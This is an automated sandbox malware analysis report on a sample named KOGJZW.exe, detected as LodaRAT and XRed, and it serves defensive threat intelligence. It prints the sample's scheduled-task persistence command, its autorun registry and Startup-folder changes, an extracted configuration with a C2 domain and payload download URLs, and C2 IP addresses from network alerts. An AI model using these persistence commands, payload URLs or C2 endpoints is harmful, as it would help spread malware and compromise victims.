Edit tour

Windows Analysis Report
KOGJZW.exe

Overview

General Information

Sample name:	KOGJZW.exe
Analysis ID:	1582338
MD5:	b53beba4041f41281a5aa172f93fbdd6
SHA1:	d0755c4d85bd826135ced6cd007cdeab6b58c077
SHA256:	5e73eaab677f6292e4a7e7a9180e4f80dbbdb5e2746d76244a65455883a2ca25
Tags:	exeknkbkk212user-JAMESWT_MHT
Infos:

Detection

LodaRAT, XRed

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LodaRAT

Yara detected XRed

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Document contains an embedded VBA macro with suspicious strings

Document contains an embedded VBA with functions possibly related to ADO stream file operations

Document contains an embedded VBA with functions possibly related to HTTP operations

Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)

Drops PE files to the document folder of the user

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Potentially Suspicious Malware Callback Communication

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Uses dynamic DNS services

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query the security center for anti-virus and firewall products

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops files with a non-matching file extension (content does not match file extension)

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May infect USB drives

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

OS version to string mapping found (often used in BOTs)

One or more processes crash

PE file contains executable resources (Code or Archives)

Potential key logger detected (key state polling based)

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Sleep loop found (likely to delay execution)

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara detected ProcessChecker

Classification

Process Tree

System is w10x64

KOGJZW.exe (PID: 7592 cmdline: "C:\Users\user\Desktop\KOGJZW.exe" MD5: B53BEBA4041F41281A5AA172F93FBDD6)

._cache_KOGJZW.exe (PID: 7832 cmdline: "C:\Users\user\Desktop\._cache_KOGJZW.exe" MD5: BDFE0E6CBA45083DA1F97E4BA1B8D14F)

cmd.exe (PID: 6708 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn WSFDII.exe /tr C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe /sc minute /mo 1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 5940 cmdline: schtasks /create /tn WSFDII.exe /tr C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe /sc minute /mo 1 MD5: 48C2FE20575769DE916F48EF0676A965)

wscript.exe (PID: 6128 cmdline: WSCript C:\Users\user\AppData\Local\Temp\WSFDII.vbs MD5: FF00E0480075B095948000BDC66E81F0)

Synaptics.exe (PID: 7936 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: 7103F3EEC43BBABE34068295157F9F1C)

WerFault.exe (PID: 8472 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7936 -s 7400 MD5: C31336C1EFC2CCB44B4326EA793040F2)

EXCEL.EXE (PID: 8032 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)

splwow64.exe (PID: 9092 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)

VZVDVH.exe (PID: 1736 cmdline: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe MD5: BDFE0E6CBA45083DA1F97E4BA1B8D14F)

VZVDVH.exe (PID: 2316 cmdline: "C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe" MD5: BDFE0E6CBA45083DA1F97E4BA1B8D14F)

Synaptics.exe (PID: 2908 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: 7103F3EEC43BBABE34068295157F9F1C)

VZVDVH.exe (PID: 8068 cmdline: "C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe" MD5: BDFE0E6CBA45083DA1F97E4BA1B8D14F)

VZVDVH.exe (PID: 8508 cmdline: "C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe" MD5: BDFE0E6CBA45083DA1F97E4BA1B8D14F)

VZVDVH.exe (PID: 8640 cmdline: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe MD5: BDFE0E6CBA45083DA1F97E4BA1B8D14F)

VZVDVH.exe (PID: 8936 cmdline: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe MD5: BDFE0E6CBA45083DA1F97E4BA1B8D14F)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loda, LodaRAT	Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as Trojan.Nymeria, although the connection is not well-documented.	No Attribution	https://blog.talosintelligence.com/2020/02/loda-rat-grows-up.html https://blog.talosintelligence.com/2020/09/lodarat-update-alive-and-well.html https://blog.talosintelligence.com/2021/02/kasablanka-lodarat.html https://blog.talosintelligence.com/attributing-yorotrooper/ https://blog.talosintelligence.com/get-a-loda-this/	https://malpedia.caad.fkie.fraunhofer.de/details/win.loda

Malware Configuration

Threatname: XRed

{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
KOGJZW.exe	JoeSecurity_XRed	Yara detected XRed	Joe Security
KOGJZW.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_LodaRat_1	Yara detected LodaRAT	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Local\Temp\WSFDII.vbs	JoeSecurity_ProcessChecker	Yara detected ProcessChecker	Joe Security
C:\ProgramData\Synaptics\RCX97B8.tmp	JoeSecurity_XRed	Yara detected XRed	Joe Security
C:\ProgramData\Synaptics\RCX97B8.tmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
C:\Users\user\Documents\~$cache1	JoeSecurity_XRed	Yara detected XRed	Joe Security
C:\Users\user\Documents\~$cache1	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
C:\ProgramData\Synaptics\Synaptics.exe	JoeSecurity_XRed	Yara detected XRed	Joe Security
C:\ProgramData\Synaptics\Synaptics.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
Click to see the 2 entries

Memory Dumps

Source	Rule	Description	Author
00000007.00000002.2594422072.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_ProcessChecker	Yara detected ProcessChecker	Joe Security
00000000.00000000.1325538739.0000000000401000.00000020.00000001.01000000.00000003.sdmp	JoeSecurity_XRed	Yara detected XRed	Joe Security
00000000.00000000.1325538739.0000000000401000.00000020.00000001.01000000.00000003.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
00000003.00000003.1413662003.0000000000535000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_XRed	Yara detected XRed	Joe Security
00000007.00000002.2593322500.00000000029C0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_ProcessChecker	Yara detected ProcessChecker	Joe Security
Process Memory Space: KOGJZW.exe PID: 7592	JoeSecurity_XRed	Yara detected XRed	Joe Security
Process Memory Space: ._cache_KOGJZW.exe PID: 7832	JoeSecurity_LodaRAT	Yara detected LodaRAT	Joe Security
Process Memory Space: ._cache_KOGJZW.exe PID: 7832	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Synaptics.exe PID: 7936	JoeSecurity_XRed	Yara detected XRed	Joe Security
Process Memory Space: wscript.exe PID: 6128	JoeSecurity_ProcessChecker	Yara detected ProcessChecker	Joe Security
Click to see the 5 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.KOGJZW.exe.400000.0.unpack	JoeSecurity_XRed	Yara detected XRed	Joe Security
0.0.KOGJZW.exe.400000.0.unpack	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security

Sigma Signatures

System Summary

Sigma detected: Potentially Suspicious Malware Callback Communication

Source: Network Connection

Author: Florian Roth (Nextron Systems): Data: DestinationIp: 172.111.138.100, DestinationIsIpv6: false, DestinationPort: 5552, EventID: 3, Image: C:\Users\user\Desktop\._cache_KOGJZW.exe, Initiated: true, ProcessId: 7832, Protocol: tcp, SourceIp: 192.168.2.10, SourceIsIpv6: false, SourcePort: 49820

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: WSCript C:\Users\user\AppData\Local\Temp\WSFDII.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\WSFDII.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_KOGJZW.exe" , ParentImage: C:\Users\user\Desktop\._cache_KOGJZW.exe, ParentProcessId: 7832, ParentProcessName: ._cache_KOGJZW.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\WSFDII.vbs, ProcessId: 6128, ProcessName: wscript.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\WSFDII.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\WSFDII.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_KOGJZW.exe" , ParentImage: C:\Users\user\Desktop\._cache_KOGJZW.exe, ParentProcessId: 7832, ParentProcessName: ._cache_KOGJZW.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\WSFDII.vbs, ProcessId: 6128, ProcessName: wscript.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\WSFDII.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\WSFDII.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_KOGJZW.exe" , ParentImage: C:\Users\user\Desktop\._cache_KOGJZW.exe, ParentProcessId: 7832, ParentProcessName: ._cache_KOGJZW.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\WSFDII.vbs, ProcessId: 6128, ProcessName: wscript.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\._cache_KOGJZW.exe, ProcessId: 7832, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WSFDII

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\._cache_KOGJZW.exe, ProcessId: 7832, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WSFDII.lnk

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn WSFDII.exe /tr C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe /sc minute /mo 1, CommandLine: schtasks /create /tn WSFDII.exe /tr C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe /sc minute /mo 1, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn WSFDII.exe /tr C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe /sc minute /mo 1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6708, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn WSFDII.exe /tr C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe /sc minute /mo 1, ProcessId: 5940, ProcessName: schtasks.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\WSFDII.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\WSFDII.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_KOGJZW.exe" , ParentImage: C:\Users\user\Desktop\._cache_KOGJZW.exe, ParentProcessId: 7832, ParentProcessName: ._cache_KOGJZW.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\WSFDII.vbs, ProcessId: 6128, ProcessName: wscript.exe

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\KOGJZW.exe, ProcessId: 7592, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver

Sigma detected: Office Macro File Creation

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 7936, TargetFilename: C:\Users\user\AppData\Local\Temp\l8G3M3Tz.xlsm

Suricata Signatures

ET MALWARE Snake Keylogger Payload Request (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T11:25:25.592212+0100	2044887	1	A Network Trojan was detected	192.168.2.10	49784	216.58.206.46	443	TCP
2024-12-30T11:25:25.608141+0100	2044887	1	A Network Trojan was detected	192.168.2.10	49783	216.58.206.46	443	TCP
2024-12-30T11:25:26.946191+0100	2044887	1	A Network Trojan was detected	192.168.2.10	49796	216.58.206.46	443	TCP
2024-12-30T11:25:27.216507+0100	2044887	1	A Network Trojan was detected	192.168.2.10	49797	216.58.206.46	443	TCP
2024-12-30T11:25:28.009425+0100	2044887	1	A Network Trojan was detected	192.168.2.10	49808	216.58.206.46	443	TCP
2024-12-30T11:25:28.292270+0100	2044887	1	A Network Trojan was detected	192.168.2.10	49809	216.58.206.46	443	TCP
2024-12-30T11:25:29.021760+0100	2044887	1	A Network Trojan was detected	192.168.2.10	49818	216.58.206.46	443	TCP
2024-12-30T11:25:29.286271+0100	2044887	1	A Network Trojan was detected	192.168.2.10	49822	216.58.206.46	443	TCP
2024-12-30T11:25:30.518384+0100	2044887	1	A Network Trojan was detected	192.168.2.10	49834	216.58.206.46	443	TCP
2024-12-30T11:25:30.705941+0100	2044887	1	A Network Trojan was detected	192.168.2.10	49839	216.58.206.46	443	TCP
2024-12-30T11:25:31.495780+0100	2044887	1	A Network Trojan was detected	192.168.2.10	49848	216.58.206.46	443	TCP
2024-12-30T11:25:31.707683+0100	2044887	1	A Network Trojan was detected	192.168.2.10	49855	216.58.206.46	443	TCP
2024-12-30T11:25:32.621116+0100	2044887	1	A Network Trojan was detected	192.168.2.10	49863	216.58.206.46	443	TCP
2024-12-30T11:25:32.676616+0100	2044887	1	A Network Trojan was detected	192.168.2.10	49865	216.58.206.46	443	TCP
2024-12-30T11:25:33.553344+0100	2044887	1	A Network Trojan was detected	192.168.2.10	49875	216.58.206.46	443	TCP
2024-12-30T11:25:33.553446+0100	2044887	1	A Network Trojan was detected	192.168.2.10	49874	216.58.206.46	443	TCP
2024-12-30T11:25:34.532004+0100	2044887	1	A Network Trojan was detected	192.168.2.10	49887	216.58.206.46	443	TCP
2024-12-30T11:25:34.553408+0100	2044887	1	A Network Trojan was detected	192.168.2.10	49886	216.58.206.46	443	TCP
2024-12-30T11:25:35.757317+0100	2044887	1	A Network Trojan was detected	192.168.2.10	49894	216.58.206.46	443	TCP
2024-12-30T11:25:35.846794+0100	2044887	1	A Network Trojan was detected	192.168.2.10	49896	216.58.206.46	443	TCP
2024-12-30T11:25:36.742699+0100	2044887	1	A Network Trojan was detected	192.168.2.10	49910	216.58.206.46	443	TCP
2024-12-30T11:25:36.855745+0100	2044887	1	A Network Trojan was detected	192.168.2.10	49911	216.58.206.46	443	TCP
2024-12-30T11:25:38.054812+0100	2044887	1	A Network Trojan was detected	192.168.2.10	49921	216.58.206.46	443	TCP
2024-12-30T11:25:38.055872+0100	2044887	1	A Network Trojan was detected	192.168.2.10	49923	216.58.206.46	443	TCP

ETPRO MALWARE Loda Logger CnC Beacon

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T11:25:28.263687+0100	2822116	1	Malware Command and Control Activity Detected	192.168.2.10	49820	172.111.138.100	5552	TCP
2024-12-30T11:26:04.858055+0100	2822116	1	Malware Command and Control Activity Detected	192.168.2.10	50115	172.111.138.100	5552	TCP

ETPRO MALWARE Loda Logger CnC Beacon Response M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T11:26:32.615181+0100	2830912	1	Malware Command and Control Activity Detected	172.111.138.100	5552	192.168.2.10	50115	TCP
2024-12-30T11:27:06.019337+0100	2830912	1	Malware Command and Control Activity Detected	172.111.138.100	5552	192.168.2.10	50115	TCP

ETPRO MALWARE W32.Bloat-A Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T11:25:26.018350+0100	2832617	1	Malware Command and Control Activity Detected	192.168.2.10	49792	69.42.215.252	80	TCP

ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T11:25:10.157159+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.10	49820	172.111.138.100	5552	TCP
2024-12-30T11:25:10.157159+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.10	49930	172.111.138.100	5552	TCP
2024-12-30T11:25:10.157159+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.10	50115	172.111.138.100	5552	TCP
2024-12-30T11:25:10.157159+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.10	50030	172.111.138.100	5552	TCP
2024-12-30T11:25:10.157159+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.10	50101	172.111.138.100	5552	TCP
2024-12-30T11:25:28.263687+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.10	49820	172.111.138.100	5552	TCP
2024-12-30T11:25:37.619794+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.10	49930	172.111.138.100	5552	TCP
2024-12-30T11:25:46.738542+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.10	50030	172.111.138.100	5552	TCP
2024-12-30T11:25:55.757927+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.10	50101	172.111.138.100	5552	TCP
2024-12-30T11:26:04.858055+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.10	50115	172.111.138.100	5552	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: KOGJZW.exe	Avira: detected
Source: KOGJZW.exe	Avira: detected

Antivirus detection for URL or domain

Source: http://xred.site50.net/syn/SSLLibrary.dlD	Avira URL Cloud: Label: malware
Source: http://xred.site50.net/syn/Synaptics.rarh	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\ProgramData\Synaptics\RCX97B8.tmp	Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\ProgramData\Synaptics\RCX97B8.tmp	Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Users\user\AppData\Local\Temp\WSFDII.vbs	Avira: detection malicious, Label: VBS/Runner.VPJI
Source: C:\ProgramData\Synaptics\Synaptics.exe	Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\ProgramData\Synaptics\Synaptics.exe	Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Users\user\Documents\~$cache1	Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\Users\user\Documents\~$cache1	Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006

Found malware configuration

Source: KOGJZW.exe

Malware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\Synaptics\Synaptics.exe	ReversingLabs: Detection: 92%
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	ReversingLabs: Detection: 50%

Multi AV Scanner detection for submitted file

Source: KOGJZW.exe	Virustotal: Detection: 88%			Perma Link
Source: KOGJZW.exe	ReversingLabs: Detection: 92%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 95.3% probability

Machine Learning detection for dropped file

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\Synaptics\RCX97B8.tmp	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\Synaptics\Synaptics.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Documents\~$cache1	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: KOGJZW.exe

Joe Sandbox ML: detected

Source: KOGJZW.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:49784 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:49783 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.225:443 -> 192.168.2.10:49799 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.225:443 -> 192.168.2.10:49798 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:49808 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:49809 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:49834 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:49834 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:49839 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:49863 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:49865 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:49910 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:49911 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:49921 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:49923 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.225:443 -> 192.168.2.10:49936 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.225:443 -> 192.168.2.10:49939 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:49961 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:49960 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:49984 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:49985 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.225:443 -> 192.168.2.10:49995 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:49996 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.225:443 -> 192.168.2.10:49994 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:49993 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:50018 version: TLS 1.2
